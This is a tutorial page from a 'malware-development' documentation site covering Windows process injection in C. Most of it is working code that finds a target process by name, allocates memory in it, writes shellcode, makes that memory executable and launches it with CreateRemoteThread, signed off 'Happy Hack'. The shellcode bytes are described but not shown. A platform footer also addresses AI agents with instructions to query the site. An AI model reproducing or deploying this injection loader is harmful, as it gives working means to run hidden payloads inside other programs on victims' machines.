> For the complete documentation index, see [llms.txt](https://everythingblackkk.gitbook.io/everythingblackkk/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://everythingblackkk.gitbook.io/everythingblackkk/malware-development/editor-1.md).
# Process Injection --Part 2--
### **1. Finding the Target Process ID**
The function `FindProcessID(const char *processName)` is used to retrieve the Process ID (PID) of a running process by its name.
#### **How it works:**
* It takes a snapshot of all running processes using `CreateToolhelp32Snapshot()`.
* It loops through the process list using `Process32First()` and `Process32Next()`.
* If it finds a process with a matching name `(strcmp(pe32.szExeFile, processName) == 0)`, it returns the **Process ID**.
```c
// Function to find process ID by name
DWORD FindProcessID(const char *processName) {
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot == INVALID_HANDLE_VALUE) {
printf("Failed to take snapshot of processes. Error: %lu\n", GetLastError());
return 0;
}
if (!Process32First(snapshot, &pe32)) {
printf("Failed to get first process. Error: %lu\n", GetLastError());
CloseHandle(snapshot);
return 0;
}
do {
if (strcmp(pe32.szExeFile, processName) == 0) {
CloseHandle(snapshot);
return pe32.th32ProcessID;
}
} while (Process32Next(snapshot, &pe32));
CloseHandle(snapshot);
return 0;
}
```
***
### **2. Defining the Shellcode**
The `unsigned char shellcode[]` contains raw machine code (in hexadecimal format). This shellcode is executed inside the target process after being injected.
### **3. Allocating Memory in the Target Process**
* `VirtualAllocEx()` is called to allocate memory inside the target process.
* The allocated memory has **PAGE\_READWRITE** permissions for now.
* If memory allocation fails, the program cleans up and exits.
```csharp
LPVOID allocated_mem = VirtualAllocEx(hProcess, NULL, shell_code_size , MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (!allocated_mem) {
printf("[!] Memory allocation failed. Error: %lu\n", GetLastError());
CloseHandle(hProcess);
return -1;
}
printf("[+] Memory allocated at: 0x%p\n", allocated_mem);
```
***
### **3. Writing the Shellcode to the Allocated Memory**
* `WriteProcessMemory()` writes the shellcode to the allocated memory.
* If writing fails, it frees the allocated memory and exits.
```csharp
// Write shellcode to allocated memory
if (!WriteProcessMemory(hProcess, allocated_mem, shellcode, shell_code_size , NULL)) {
printf("[!] Failed to write shellcode. Error: %lu\n", GetLastError());
VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return -1;
}
```
***
### **4. Changing Memory Permissions**
* `VirtualProtectEx()` changes the memory protection from **PAGE\_READWRITE** to **PAGE\_EXECUTE\_READ**.
* This allows the shellcode to be executed.
```c
// Change memory protection to executable
DWORD oldProtect;
if (!VirtualProtectEx(hProcess, allocated_mem, shell_code_size, PAGE_EXECUTE_READ, &oldProtect)) {
printf("[!] Failed to change memory protection. Error: %lu\n", GetLastError());
VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return -1;
}
```
***
### **5. Creating a Remote Thread**
* `CreateRemoteThread()` is used to create a new thread inside the target process.
* The **entry point** for this thread is the allocated memory containing the shellcode.
* If the function fails, the program cleans up and exits.
```c
// Create a remote thread to execute shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocated_mem, NULL, 0, NULL);
if (!hThread) {
printf("[!] Failed to create remote thread. Error: %lu\n", GetLastError());
VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return -1;
}
```
***
### **8. Waiting for the Shellcode Execution**
* `WaitForSingleObject(hThread, INFINITE)` waits for the shellcode execution to complete.
* `VirtualFreeEx()` releases the allocated memory.
* `CloseHandle(hThread)` and `CloseHandle(hProcess)` close the handles to prevent resource leaks.
* A final message `[+] We Are Do it <3 Happy Hack` is printed.
```c
// Wait for the shellcode to execute
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
printf("[+] We Are Do it <3 Happy Hack\n");
```
***
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://everythingblackkk.gitbook.io/everythingblackkk/malware-development/editor-1.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.